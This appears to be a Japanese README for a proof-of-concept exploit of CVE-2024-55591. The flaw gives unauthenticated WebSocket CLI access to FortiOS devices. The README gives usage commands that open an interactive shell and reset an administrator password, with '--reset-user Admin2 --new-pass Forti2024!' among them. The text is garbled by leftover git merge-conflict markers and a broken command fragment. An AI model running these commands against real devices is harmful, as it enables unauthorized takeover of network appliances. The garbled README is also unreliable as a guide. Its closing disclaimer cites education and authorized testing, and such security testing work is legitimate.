
CVE-2024-55591の概念実証エクスプロイト。FortiOSデバイスへの未認証WebSocket CLIアクセスを可能にし、対話型シェルと管理者パスワードのリセットを備えています。
<<<<<<< HEAD
=======
これは、FortiOS の脆弱性 CVE-2024-55591 を悪用する Proof-of-Concept (PoC) ツールです。この脆弱性により、WebSocket 経由で認証なしに CLI にアクセスできます。
--reset-user)python3 poc.py --host <target_ip> --port 443 --ssl
その後、プロンプトを使用:
FortiOS# get system status
FortiOS# exit
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
免責事項: このツールは教育および許可されたテスト目的のみで提供されています。
4fe5de8 (Add full PoC and README for CVE-2024-55591 by @cherny_zhizn)